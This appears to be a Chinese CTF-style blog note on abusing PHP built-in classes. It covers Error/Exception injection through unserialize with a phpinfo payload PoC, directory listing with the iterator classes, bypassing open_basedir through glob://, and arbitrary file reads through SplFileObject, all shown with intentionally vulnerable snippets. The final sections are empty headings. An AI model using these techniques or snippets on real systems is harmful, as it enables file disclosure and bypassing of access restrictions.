本文最后更新于:10 个月前
PHP原生类
异常原生类
error:(PHP7,8)
Exception:(PHP5,7,8)
1 2 3 4 5 6 7 8 9 10
| <?php highlight_file(__FILE__);
if($_GET['dir']){ $dir = $_GET['dir'];
$a = new Error($dir);
echo $a; }
|
那,既然这样,那我有个大胆的想法。。
1 2 3 4 5 6 7 8 9 10 11
| <?php highlight_file(__FILE__);
if($_GET['dir']){ $dir = $_GET['dir']; $class = $_GET['class'];
$a = new $class($dir);
echo $a; }
|
当然通常环境下,开发者通常也不会在程序内留下可控的创建新类对象,可能会有以下的情况:
1 2 3 4 5 6 7 8
| <?php highlight_file(__FILE__);
if($_GET['dir']){ $dir = $_GET['dir']; $a = unserialize($dir); echo $a; }
|
这时候我们编写poc:
1 2 3 4 5 6
| <?php $a = new Error("<?php phpinfo();?>"); $b = serialize($a); echo urlencode($b);
|
原生类读取目录:
DirectoryIterator:(PHP5,7,8)
读取目录下单个文件(目录)名,若需要全部打印出来要循环
1 2 3 4 5 6 7 8 9 10 11 12
| <?php highlight_file(__FILE__);
if($_GET['dir']){ $dir = $_GET['dir'];
$a = new FilesystemIterator($dir);
foreach($a as $f){ echo($f->__toString().'<br>'); } }
|
FilesystemIterator:(PHP 5>=5.3,7,8,DirectoryIterator的子类)
DirectoryIterator
和FilesystemIterator
均有一个__toString()
方法,将获取的结果转为字符串
1 2 3 4 5 6 7 8 9 10 11 12
| <?php highlight_file(__FILE__);
if($_GET['dir']){ $dir = $_GET['dir'];
$a = new DirectoryIterator($dir);
foreach($a as $f){ echo($f->__toString().'<br>'); } }
|
结合glob://伪协议可绕过open_basedir的限制:
GlobIterator:(PHP 5>=5.3,7,8)
1 2 3 4 5 6 7 8 9 10 11 12
| <?php highlight_file(__FILE__);
if($_GET['dir']){ $dir = $_GET['dir'];
$a = new GlobIterator($dir);
foreach($a as $f){ echo($f->__toString().'<br>'); } }
|
读取文件:
SplFileObject:
1 2 3 4 5 6 7 8 9 10 11 12
| <?php highlight_file(__FILE__);
if($_GET['dir']){ $dir = $_GET['dir'];
$a = new SplFileObject($dir);
foreach($a as $f){ echo($f); } }
|
SoapClient:
ReflectionMethod: